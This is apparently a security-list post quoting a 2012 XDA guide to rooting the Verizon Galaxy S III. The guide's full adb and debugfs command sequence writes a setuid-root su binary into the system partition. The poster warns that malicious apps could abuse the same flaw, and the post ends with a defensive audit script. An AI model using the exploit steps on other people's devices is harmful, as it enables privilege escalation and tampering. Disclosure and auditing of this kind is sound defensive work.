debugfs exploit for a number of Android devices
I haven't seen a reference to this in the archives, so for the sake of completeness here it is:
[ROOT][HOWTO] WIP: Root the Verizon GSIII without flashing a ROM
UPDATE: I created a tool based on this method. Head over
to the new thread.
---
WARNING: This is WIP for now. Don't run it if you aren't comfortable with the possibility of having
something go wrong and having to re-Odin back to stock or worse. I was already rooted and had
Busybox installed, so even though I temp-unrooted first, I don't know for certain if this will work
on a stock device. If anyone wants to flash back to pure stock and give it a shot, I'd appreciate
it. If it works, I'll try and make it easier to use.
NOTE: This may give you the custom unlock screen! I'm not 100% certain it was this root
method that did it, though, as I had installed BusyBox and frozen several system apps with
TiBu before my most recent reboot. I need someone willing to test. I don't
have time to back up, flash to stock, and retry at the moment.
Background: Since some people seem to have mysterious issues after flashing the root66 image, I've been looking at existing ICS root methods which don't require flashing ROMs to see if any work on the GSIII. I think I've found one.
This is an adaptation of miloj's root method for the Asus TF300T. All credit goes to him and anyone else he mentioned in his post.
Instructions:
Code:
adb push debugfs /data/local/
adb push su /data/local/
adb shell
$ cd /data/local/
$ mv tmp tmp.bak
$ ln -s /dev/block/mmcblk0p14 tmp
$ exit
adb reboot
... wait for phone to reboot ...
adb shell
$ cd /data/local
$ toolbox chmod 755 /data/local/debugfs
$ /data/local/debugfs -w /data/local/tmp
debugfs: cd xbin
debugfs: rm su
debugfs: write /data/local/su su
debugfs: set_inode_field su mode 0106755
debugfs: set_inode_field su uid 0
debugfs: set_inode_field su gid 0
debugfs: quit
$ rm /data/local/tmp
$ mv /data/local/tmp.bak /data/local/tmp
$ exit
adb reboot
... wait for phone to reboot ...
adb shell
$ /system/xbin/su
# id
You should see: id=0(root) gid=0(root) ....
# exit
$ rm /data/local/su
$ rm /data/local/debugfs
$ exit
binary update feature to install a proper binary. Otherwise, you're just asking to get malware.
Source Link: http://forum.xda-developers.com/showthread.php?t=1790104

Looks like on a number of devices you can symlink the block device that gets mounted on /system to something like /data/local/tmp, and then use debugfs to edit that file system. This allows rooting by the local user, but also all sorts of nastiness by malicious apps that might bundle a copy of debugfs and then change arbitrary files in /system, raise privileges, etc.
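An added defender-side audit check, not part of the XDA post or the quoted procedure: it flags the precondition the method relies on, a symlink under /data/local that points at a raw partition under /dev/block, and reports whether that device node is writable by the unprivileged shell user. It assumes `find` and `readlink` are available (as with BusyBox; a 2012-era toolbox may lack them) and uses the /data/local path and /dev/block naming quoted above.

```shell
#!/bin/sh
# Audit helper (added example, not from the original post).
# Looks for the /data/local symlink-to-partition setup used by the debugfs
# root method and reports the device node's writability for the current user.

# Print every direct child of $1 that is a symlink into /dev/block as
# "link -> target". Returns 1 if at least one such symlink exists, else 0.
find_block_symlinks() {
    dir="$1"
    found=0
    # -maxdepth 1: only direct children, so the check stays cheap on a device
    for link in $(find "$dir" -maxdepth 1 -type l 2>/dev/null); do
        target=$(readlink "$link")
        case "$target" in
            /dev/block/*)
                echo "$link -> $target"
                found=1
                ;;
        esac
    done
    return $found
}

# Return 0 if the node at $1 is writable by the current user. When run as the
# adb shell user, a 0 here means debugfs -w could modify the partition directly.
block_dev_writable() {
    [ -w "$1" ]
}

# Run both checks against the paths from the thread (defaults, overridable).
audit() {
    dir="${1:-/data/local}"
    dev="${2:-/dev/block/mmcblk0p14}"
    if find_block_symlinks "$dir"; then
        echo "no /dev/block symlinks under $dir"
    else
        echo "WARNING: symlink(s) into /dev/block found under $dir"
    fi
    if block_dev_writable "$dev"; then
        echo "WARNING: $dev is writable by uid $(id -u)"
    else
        echo "$dev is not writable by uid $(id -u)"
    fi
}
```

Run `audit` from an adb shell to check a device; `audit /some/dir /dev/block/xxx` checks other locations.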